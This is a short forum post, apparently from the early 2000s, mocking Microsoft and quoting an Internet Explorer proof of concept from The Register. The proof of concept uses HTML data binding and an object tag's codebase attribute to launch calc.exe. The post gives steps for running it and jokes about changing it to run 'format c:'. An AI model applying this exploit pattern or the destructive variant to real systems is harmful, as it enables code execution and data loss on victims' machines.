Or how about this one from
The Register<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
Just copy that into any text editor, save as a *.html file and open it with IE. According to the article, this will launch the calculator program. Macro$uck doesn't have a patch for this (so what else did you expect? :eek: ) There is a way to get around this, but the cure sounds almost as bad as the disease. I don't suppose it would be too much trouble to get that to do, let's say, format c:

?
Yet another Stupid Windows Trick from the Trustworthy Computing Co.
